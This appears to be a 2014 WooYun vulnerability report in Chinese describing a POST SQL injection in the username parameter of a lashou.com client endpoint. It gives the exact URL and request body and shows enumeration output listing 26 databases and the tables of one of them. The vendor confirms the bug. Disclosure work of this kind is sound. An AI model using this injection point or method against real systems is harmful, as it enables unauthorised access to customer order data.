漏洞详情
披露状态:
2014-02-19: 细节已通知厂商并且等待厂商处理中
2014-02-20: 厂商已经确认,细节仅向厂商公开
2014-03-02: 细节向核心白帽子及相关领域专家公开
2014-03-12: 细节向普通白帽子公开
2014-03-22: 细节向实习白帽子公开
2014-04-05: 细节向公众公开
简要描述:
POST SQL注入一枚多库 大量敏感信息
详细说明:
URL:
http://go.client.lashou.com:80/index.php/Seven/mylist/cancel_order/STID/groupbuy_4.82_ipad_10000_c9ea79576bf848d860b1a9820e286df4fd483e88_43746679_2419_iPad4,1_7.0.4_43D1A5CC-C1A4-4EAA-A833-E376C5849BAD_c9ea79576bf848d860b1a9820e286df4fd483e88
POST:
password=5416d7***855e84&username=niliu&time=1392819709&sign=84badb52147fcf003d33e5a939e9&trade_no=793411522a66e2519
username参数过滤不严存在注入
26个数据库
available databases [26]:
[*] `EN
[*] `hotel
[*] `lashoblog`
[*] `lashou_sem`
[*] `lashou_ssb
[*] `lgolR`
[*] `nyqrlB:`
[*] `odntqm`
[*] `smgu:C#
[*] `tgonUW
[*] `tipt
[*] adbrgss
[*] dataminihg
[*] dating
[*] game_togk
[*] house
[*] hui
[*] information_schema
[*] lashou_acriviry
[*] lashou_dianping
[*] lashou_hlpel
[*] lashou_huk
[*] lashou_jd
[*] lashou_mall
[*] lodpo
[*] mylpp
Database: lashou_mall
[23 tables]
+-----------------------------+
| mall_activity_category |
| mall_brand |
| mall_brand_category |
| mall_brand_category_2 |
| mall_brand_goods |
| mall_brand_merchant |
| mall_brand_promotion |
| mall_brand_tuangou_cat |
| mall_category |
| mall_category_goods |
| mall_category_goods_2 |
| mall_category_merchant |
| mall_category_merchant_2 |
| mall_index_category_brand |
| mall_index_category_brand_2 |
| mall_index_goods |
| mall_index_publish |
| mall_online_cat |
| online_index_log |
| tuangou_mall_shop |
| tuangou_mall_sp_cat |
| up_goods_online |
| up_sgoods_online |
+-----------------------------+
漏洞证明:
一号店,京东,淘宝等各种订单数据
修复方案:
#过滤相关参数
#求20rank!
版权声明:转载请注明来源 niliu@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:18
确认时间:2014-02-20 09:42
厂商回复:
已经告知开发,紧急处理,感谢
最新状态:
暂无